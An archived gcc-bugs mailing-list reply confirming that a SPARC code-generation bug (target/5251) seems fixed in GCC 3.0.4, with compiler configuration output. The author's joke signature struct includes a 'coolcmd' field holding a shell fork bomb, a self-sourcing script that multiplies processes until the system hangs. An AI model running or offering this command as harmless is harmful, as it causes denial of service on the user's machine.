This is the mail archive of the gcc-bugs@gcc.gnu.org mailing list for the GCC project.


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]
Other format: [Raw text]

Re: target/5251: [sparc] bus error code generated for non-applicable code


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Wednesday 15 January 2003 00:20, bangerth@dealii.org wrote:
>     Feedback was provided. However, I cannot reproduce the
>     problem with 3.0.4 or 3.2. Can you say whether this
>     still applies?

Seems fixed.
Works fine with 3.0.4:

Thanks.

$ g++-3.0 -v
Reading specs from /usr/lib/gcc-lib/sparc-linux/3.0.4/specs
Configured with: ../src/configure -v 
- --enable-languages=c,c++,java,f77,proto,objc --prefix=/usr 
- --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as 
- --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls 
- --without-included-gettext --disable-checking --enable-threads=posix 
- --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc sparc-linux
Thread model: posix
gcc version 3.0.4

- ---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomas@habets.pp.se" };
  char kernel[]    = { "Linux 2.4" };
  char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
  char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+JT+RKGrpCq1I6FQRAlJtAKCMKKBMAdi+tMSDtR8lZH6b+jdVIwCglR7v
x+Fyz5LTXRT2X1dNsVG2sYs=
=apkK
-----END PGP SIGNATURE-----


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]